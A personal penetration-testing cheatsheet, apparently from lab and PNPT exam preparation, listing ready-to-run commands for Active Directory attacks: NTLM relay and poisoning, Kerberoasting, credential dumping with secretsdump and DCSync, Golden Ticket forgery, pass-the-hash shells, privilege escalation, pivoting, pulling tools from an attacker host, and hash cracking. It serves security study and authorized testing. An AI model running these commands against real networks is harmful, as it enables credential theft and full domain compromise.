Pentest Cheatsheet

Built from my own lab work, PEH course notes, and PNPT exam prep. Not a generic reference. Every command here is something I have actually run in my AD lab on the DT (HP Z440, 128GB RAM, Quadro K2200). Updated as I learn new techniques.

Hashcat commands use my exact DT path. Both PNPT and PT1 exams allow all tools, your own machines, and are not proctored.

Download Full PDF Cheatsheet88 commands across 12 sections

ftp <ip> (user: anonymous)

Port 21 -- FTP anonymous login check

hydra -l user -P wordlist ssh://<ip>

Port 22 -- SSH brute force

smtp-user-enum -M VRFY -U users.txt -t <ip>

Port 25 -- SMTP user enumeration

dig axfr @<ip> <domain>

Port 53 -- DNS zone transfer

whatweb <url> && gobuster dir -u <url> -w <wordlist>

Port 80/443 -- HTTP tech fingerprint + directory brute

enum4linux -a <ip>

Port 139/445 -- SMB null session enumeration

smbclient -L //<ip>/ -N

Port 139/445 -- List SMB shares without creds

nmap --script smb2-security-mode -p 445 <ip>

Port 445 -- Check SMB signing (for relay attacks)

ldapsearch -x -H ldap://<ip> -s base namingcontexts

Port 389 -- LDAP anonymous bind

evil-winrm -i <ip> -u user -p pass

Port 5985 -- WinRM shell access

mssqlclient.py user:pass@<ip>

Port 1433 -- MSSQL login (xp_cmdshell for RCE)

xfreerdp /u:user /p:pass /v:<ip>

Port 3389 -- RDP connection

whois <domain>

Domain registration info

dig <domain> ANY

All DNS records

amass enum -passive -d <domain>

Passive subdomain enumeration

assetfinder <domain>

Subdomain discovery via certificate transparency

theHarvester -d <domain> -b google,bing,linkedin

Email and subdomain harvesting

shodan search hostname:<domain>

Exposed services and banners

nmap -sn <subnet>/24

Host discovery (ping sweep)

nmap -sC -sV -oN initial.nmap <ip>

Top 1000 ports with scripts + versions

nmap -p- -T4 -oN allports.nmap <ip>

Full 65535 port scan

nmap -sU --top-ports 50 <ip>

UDP scan (SNMP, TFTP, DNS)

sudo responder -I eth0 -dPv

LLMNR/NBT-NS poisoning -- capture NTLMv2 hashes

Safe to run all day. Best times: morning + after lunch.

nmap --script=smb2-security-mode.nse -p445 <subnet>/24

Check SMB signing for relay targets ('enabled but not required' = vulnerable)

sudo ntlmrelayx.py -tf targets.txt -smb2support

SMB Relay (default: SAM dump). Turn OFF SMB+HTTP in Responder.conf first.

sudo ntlmrelayx.py -tf targets.txt -smb2support -i

SMB Relay with interactive shell. Connect: nc 127.0.0.1 11000

sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

SMB Relay with command execution

sudo mitm6 -d <domain.local>

IPv6 DNS takeover. Run for 5-10 min MAX (can cause outages).

ntlmrelayx.py -6 -t ldaps://<DC-IP> -wh fakewpad.<domain> -l lootme

mitm6 LDAPS relay. Dumps domain info. If DA logs in: auto-creates DCSync user.

GetNPUsers.py <domain>/ -usersfile users.txt -no-pass -dc-ip <DC>

AS-REP Roasting (no creds needed). Crack with hashcat -m 18200.

bloodhound-python -u user -p pass -d <domain> -c all -ns <DC>

BloodHound data collection. Import JSON, find shortest paths to DA.

GetUserSPNs.py <domain>/user:pass -dc-ip <DC> -request

Kerberoasting. Crack TGS hash with hashcat -m 13100. Run this FIRST.

crackmapexec smb <DC> -u users.txt -p 'Pass123' --continue-on-success

Password spraying. Check --pass-pol first to avoid lockouts.

crackmapexec smb <DC> -u user -p pass --pass-pol

Dump password policy before spraying

secretsdump.py <domain>/user:'pass'@<ip>

Dump SAM + cached creds + LSA secrets. Check for WDigest cleartext!

secretsdump.py administrator@<ip> -hashes <LM:NT>

secretsdump with hash (no password needed)

crackmapexec smb <subnet>/24 -u user -d DOMAIN -p pass

Pass-the-Password sweep (domain creds)

crackmapexec smb <subnet>/24 -u administrator -H <hash> --local-auth

Pass-the-Hash sweep (local admin)

crackmapexec smb <subnet>/24 -u admin -H <hash> --local-auth --sam

Dump SAM from every Pwn3d host

crackmapexec smb <subnet>/24 -u admin -H <hash> --local-auth --lsa

Dump LSA secrets (DCC2 cached creds)

crackmapexec smb <subnet>/24 -u admin -H <hash> --local-auth --shares

Enumerate shares on Pwn3d hosts

psexec.py <DOMAIN>/user:'pass'@<ip>

Get SYSTEM shell (preferred, less noisy than Metasploit)

psexec.py administrator@<ip> -hashes <LM:NT>

Shell via Pass-the-Hash

wmiexec.py <DOMAIN>/user:'pass'@<ip>

Shell fallback (less artifacts than psexec)

smbexec.py <DOMAIN>/user:'pass'@<ip>

Shell fallback (no file on disk, stealthiest)

cmedb

CrackMapExec database. Commands: hosts, creds, export.

secretsdump.py <domain>/admin:pass@<DC>

DCSync -- dump NTDS.dit (every hash in the domain)

ticketer.py -nthash <krbtgt_hash> -domain-sid <SID> -domain <domain> Administrator

Golden Ticket -- forge TGT with krbtgt hash

export KRB5CCNAME=Administrator.ccache && psexec.py <domain>/Admin@<DC> -k -no-pass

Use Golden Ticket for persistent DA access

whoami /all && systeminfo && net user

First commands after landing on Windows

winPEASany.exe

Automated Windows privesc enumeration

PrintSpoofer.exe -i -c cmd

SeImpersonatePrivilege -> SYSTEM (Win10/2016+)

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows"

Find unquoted service paths

cmdkey /list

Check for stored credentials (then runas /savecred)

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Check AlwaysInstallElevated for MSI privesc

schtasks /query /fo LIST /v

Find scheduled tasks with writable scripts

Watson.exe

Kernel exploit suggester (last resort)

id && uname -a && sudo -l

First commands after landing on Linux

./linpeas.sh

Automated Linux privesc enumeration

sudo vim -c ':!/bin/bash'

GTFOBins: vim with sudo -> root shell

find / -perm -u=s -type f 2>/dev/null

Find SUID binaries

getcap -r / 2>/dev/null

Find binaries with capabilities

cat /etc/crontab && ls -la /etc/cron.*

Check cron jobs for writable scripts

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Docker group -> root on host filesystem

ssh -D 1080 user@<pivot>

Dynamic SOCKS proxy via SSH

ssh -L 8080:<target>:80 user@<pivot>

Local port forward (access remote via local)

sshuttle -r user@<pivot> <internal_subnet>/24

Transparent VPN-like proxy (no proxychains needed)

chisel server --reverse -p 8888

Chisel server (on attacker)

chisel client <attacker>:8888 R:socks

Chisel client (on pivot) -> SOCKS proxy

proxychains nmap -sT -Pn <internal_ip>

Scan through SOCKS proxy

certutil -urlcache -split -f http://<kali>/file.exe file.exe

Windows: download file via certutil

IWR -Uri http://<kali>/file.exe -OutFile file.exe

Windows: download via PowerShell

impacket-smbserver share /tmp -smb2support

Host SMB share on Kali for file transfer

wget http://<kali>/file -O /tmp/file

Linux: download file

python3 -m http.server 80

Host files on Kali (attacker side)

.\hashcat.exe -m 5600 hashes.txt rockyou.txt --backend-ignore-cuda -O

Crack NTLMv2 (Responder capture) on DT

.\hashcat.exe -m 1000 hashes.txt rockyou.txt --backend-ignore-cuda -O

Crack NTLM (SAM dump) on DT

.\hashcat.exe -m 13100 krb.txt rockyou.txt --backend-ignore-cuda -O

Crack Kerberos TGS (Kerberoasting) on DT

.\hashcat.exe -m 18200 asrep.txt rockyou.txt --backend-ignore-cuda -O

Crack AS-REP (AS-REP Roasting) on DT

.\hashcat.exe -m 2100 dcc2.txt rockyou.txt --backend-ignore-cuda -O

Crack DCC2 cached creds (from LSA dump)

.\hashcat.exe -m 5600 hashes.txt targeted.txt -r OneRuleToRuleThemStill.rule --backend-ignore-cuda -O

Rule-based cracking with targeted wordlist

cewl https://target.com -d 3 -m 5 -w custom.txt

Generate wordlist from target website

slither .

Run all Slither detectors on current project

aderyn .

Cyfrin's Rust-based static analyzer (fewer false positives)

forge test -vvvv

Run Foundry tests with verbose traces

forge test --match-test testExploit

Run specific exploit test

cast storage <contract> <slot> --rpc-url <url>

Read any storage slot on-chain (nothing is private)

echidna . --contract MyContract

Property-based fuzzing for invariant testing